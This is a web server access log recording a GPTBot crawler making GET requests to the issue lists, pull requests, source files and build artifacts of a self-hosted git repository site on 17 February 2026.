"/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:18:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 74.7.227.38] [Length 12327] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:18:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 74.7.227.38] [Length 13791] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:18:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 21810] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:18:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 11095] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:18:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9930] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 15904] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:18:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:49:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9861] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10645739] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 1041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build" [Client 74.7.227.38] [Length 10101] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:18:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16281] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15147] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:18:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13234] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:18:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 